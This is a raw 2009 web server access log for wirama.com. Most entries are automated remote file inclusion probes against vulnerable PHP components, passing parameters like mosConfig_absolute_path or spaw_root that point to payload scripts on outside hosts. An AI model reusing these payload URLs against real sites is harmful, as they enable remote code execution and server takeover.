195.207.160.102 - - [01/Jul/2009:04:28:17 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:28:19 -0700] "GET /logs/access_090301.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [01/Jul/2009:04:33:04 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [01/Jul/2009:04:33:04 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.172.22.2 - - [01/Jul/2009:04:33:24 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:33:24 -0700] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:33:24 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:33:24 -0700] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:04:34:09 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [01/Jul/2009:04:34:09 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [01/Jul/2009:04:34:09 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.40.150.211 - - [01/Jul/2009:04:34:16 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
64.40.150.211 - - [01/Jul/2009:04:34:16 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
69.94.56.39 - - [01/Jul/2009:04:37:37 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.94.56.39 - - [01/Jul/2009:04:37:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.94.56.39 - - [01/Jul/2009:04:37:37 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.37.60 - - [01/Jul/2009:04:39:50 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:39:50 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:39:50 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:39:56 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:40:06 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:40:06 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:40:06 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.191.37.60 - - [01/Jul/2009:04:40:12 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.40.150.211 - - [01/Jul/2009:04:48:24 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
65.55.106.193 - - [01/Jul/2009:04:50:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:24:28 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:24:28 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:24:28 -0700] "GET /logs/access_090531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:34:34 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:34:34 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:34:34 -0700] "GET /logs/access_090531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:37:42 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:37:42 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:37:42 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:39:35 -0700] "GET /logs/access_090301.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:05:41:31 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:41:31 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:41:31 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:41:35 -0700] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.208.48 - - [01/Jul/2009:05:45:20 -0700] "GET /logs/?N=D HTTP/1.1" 200 2374 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:21 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:22 -0700] "GET /logs/access_090601.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:22 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:22 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:26 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:26 -0700] "GET /logs/access_090531.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:26 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:45:26 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:46:11 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:46:11 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:46:11 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:05:46:19 -0700] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.107.181 - - [01/Jul/2009:05:47:49 -0700] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.172.22.2 - - [01/Jul/2009:05:49:16 -0700] "GET /logs/access.log/errors.php?error=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:05:49:16 -0700] "GET /logs/access.log/errors.php?error=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:05:49:16 -0700] "GET /errors.php?error=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:05:49:16 -0700] "GET /errors.php?error=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:05:50:54 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:05:50:54 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
65.55.106.193 - - [01/Jul/2009:05:51:05 -0700] "GET /?D=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
220.231.126.252 - - [01/Jul/2009:05:54:15 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:54:15 -0700] "GET /logs/access_090330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:54:15 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:05:55:08 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:05:55:23 -0700] "GET /logs/access_090601.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:55:23 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.98.222.18 - - [01/Jul/2009:05:55:23 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:00:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:00:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:00:46 -0700] "GET /logs/access_090330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:01:51 -0700] "GET /logs/access_090601.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:02:14 -0700] "GET /logs/access_090531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:02:29 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:02:29 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:02:29 -0700] "GET /logs/access_090330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:05:43 -0700] "GET /logs/access_090330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:07:36 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:07:36 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:07:36 -0700] "GET /logs/access_090330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:07:41 -0700] "GET /logs/access_090531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:07:46 -0700] "GET /logs/access_090331.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:08:10 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:56 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:56 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:56 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:57 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:57 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
84.18.198.72 - - [01/Jul/2009:06:10:57 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:12:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:12:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:12:22 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:12:58 -0700] "GET /logs/access_090330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:18:01 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:20:12 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.16.182.130 - - [01/Jul/2009:06:20:21 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.16.182.130 - - [01/Jul/2009:06:20:21 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.16.182.130 - - [01/Jul/2009:06:20:21 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.16.182.130 - - [01/Jul/2009:06:23:05 -0700] "GET /logs/access_090531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.198.4.181 - - [01/Jul/2009:06:24:28 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.wirama.com"
213.198.4.181 - - [01/Jul/2009:06:24:28 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.wirama.com"
213.198.4.181 - - [01/Jul/2009:06:24:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.wirama.com"
220.231.126.252 - - [01/Jul/2009:06:24:43 -0700] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:24:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.231.126.252 - - [01/Jul/2009:06:24:43 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.198.4.181 - - [01/Jul/2009:06:30:34 -0700] "GET /logs/access_090601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.wirama.com"
79.49.190.214 - - [01/Jul/2009:06:31:18 -0700] "GET /logs//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
79.49.190.214 - - [01/Jul/2009:06:31:42 -0700] "GET /logs/access_090330.log//bbs/outlogin.php?_zb_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
